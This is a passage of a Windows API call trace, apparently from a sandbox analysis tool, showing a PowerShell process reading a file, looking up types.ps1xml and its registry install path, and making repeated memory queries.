	[0348.947] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.947] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.947] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.948] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.948] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.949] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.949] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.949] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.949] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.950] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.950] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.950] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.950] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.952] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.952] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.952] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.952] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.952] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.953] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.953] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.953] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.953] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.954] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.954] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.954] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.954] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.955] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.955] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.955] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.957] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.958] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.958] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.958] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.958] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.959] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.959] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.959] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x1000, lpOverlapped=0x0) returned 1
	[0348.959] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x1b4, lpOverlapped=0x0) returned 1
	[0349.323] ReadFile (in: hFile=0x32c, lpBuffer=0x2cfa370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d088, lpOverlapped=0x0 | out: lpBuffer=0x2cfa370*, lpNumberOfBytesRead=0x10d088*=0x0, lpOverlapped=0x0) returned 1
	[0349.323] CloseHandle (hObject=0x32c) returned 1
	[0349.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x10cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0349.324] SetErrorMode (uMode=0x1) returned 0x1
	[0349.324] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d000 | out: lpFileInformation=0x10d000*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0349.324] SetErrorMode (uMode=0x1) returned 0x1
	[0349.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x10cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0349.324] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d0e8 | out: phkResult=0x10d0e8*=0x32c) returned 0x0
	[0349.324] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d06c, lpData=0x0, lpcbData=0x10d068*=0x0 | out: lpType=0x10d06c*=0x1, lpData=0x0, lpcbData=0x10d068*=0x56) returned 0x0
	[0349.324] CoTaskMemAlloc (cb=0x5a) returned 0x3a3300
	[0349.324] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d03c, lpData=0x3a3300, lpcbData=0x10d038*=0x56 | out: lpType=0x10d03c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10d038*=0x56) returned 0x0
	[0349.324] CoTaskMemFree (pv=0x3a3300) 
	[0349.324] RegCloseKey (hKey=0x32c) returned 0x0
	[0349.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x10cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0349.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x10cbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0350.008] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.023] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.024] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.025] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.025] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.030] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.031] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.032] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.047] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.047] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.047] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.047] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.047] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.048] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.048] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.048] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.367] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.373] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.373] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.373] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.373] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.374] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.374] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.374] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.374] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.375] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.375] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.376] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.377] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.378] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.380] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.383] VirtualQuery (in: lpAddress=0x10bde0, lpBuffer=0x10cca0, dwLength=0x30 | out: lpBuffer=0x10cca0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.383] VirtualQuery (in: lpAddress=0x10bde0, lpBuffer=0x10cca0, dwLength=0x30 | out: lpBuffer=0x10cca0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.383] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.384] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.822] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.823] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.824] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.146] CoTaskMemAlloc (cb=0x104) returned 0x1b7a89f0
	[0351.146] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a89f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0351.146] CoTaskMemFree (pv=0x1b7a89f0) 
	[0351.152] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.160] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.161] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.163] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.164] VirtualQuery (in: lpAddress=0x10bdd0, lpBuffer=0x10cc90, dwLength=0x30 | out: lpBuffer=0x10cc90*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
